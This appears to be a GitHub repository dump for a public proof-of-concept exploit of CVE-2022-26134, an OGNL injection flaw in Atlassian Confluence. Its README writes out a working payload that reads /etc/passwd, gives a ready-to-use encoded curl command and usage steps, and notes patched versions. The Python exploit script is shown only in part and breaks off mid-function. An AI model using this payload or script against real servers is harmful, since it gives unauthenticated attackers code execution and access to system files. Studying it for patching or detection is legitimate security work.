├── .gitignore ├── LICENSE ├── README.md ├── cve-2022-26134.py └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | 131 | .DS_Store 132 | targets.txt 133 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 iveresk 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2022-26134 by 1vere$k 2 | Just simple PoC for the Atlassian Jira exploit. Provides code execution for unauthorised user on a server. 3 | 4 | 5 | **CVE-2022-26134 - OGNL injection vulnerability.** 6 | 7 | Script proof of concept that exploits the remote code execution vulnerability affecting Atlassian Confluence 7.18 and lower products. The OGNL injection vulnerability allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance. 8 | 9 | ## Payload 10 | 11 | ``` 12 | ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))} 13 | ``` 14 | 15 | **Example with CURL command:** 16 | 17 | ``` 18 | curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 19 | ``` 20 | 21 | Then, the result of the command will be reflected in the parameter `X-Cmd-Response` in the response header. 22 | 23 | **Mitigations guidelines from vendors** 24 | 25 | Follow the official recommendations from Atlassian: 26 | https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html 27 | 28 | ## Patched Versions 29 | 30 | Atlassian released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a patch for this issue. 31 | 32 | ## Usage 33 | ``` 34 | 1. git clone https://github.com/iveresk/cve-2022-26134.git 35 | 2. cd cve-2022-26134 36 | 3. pip install -r requirements.txt 37 | 4. Ex#1: python3 cve-2022-26134.py - command is optional - default will be set as "whoami" just to check if your server is vulnerable 38 | 5. Ex#2: 4. Ex#1: python3 cve-2022-26134.py 39 | ``` 40 | 41 | ## Contact 42 | 43 | You are free to contact me via [Keybase](https://keybase.io/1veresk) for any details. -------------------------------------------------------------------------------- /cve-2022-26134.py: -------------------------------------------------------------------------------- 1 | import time 2 | import requests 3 | import urllib3 4 | import re 5 | import sys 6 | import os.path 7 | 8 | urllib3.disable_warnings() 9 | 10 | 11 | def usage(): 12 | print("\033[1;94mHow to use:\033[1;m") 13 | print("python3 {} https://target.com cmd [Default cmd == `whoami`]".format(sys.argv[0])) 14 | print("ex: python3 {} https://target.com id".format(sys.argv[0])) 15 | print("ex: python3 {} https://target.com 'ps aux'".format(sys.argv[0])) 16 | return 17 | 18 | 19 | def check_target_version(host): 20 | try: 21 | response = requests.get("https://{}/login.action".format(host), verify=False, timeout=8) 22 | if response.status_code == 200: 23 | filter_version = re.findall(".*", response.text) 24 | 25 | if len(filter_version) >= 1: 26 | version = filter_version[0].split("'>")[1].split('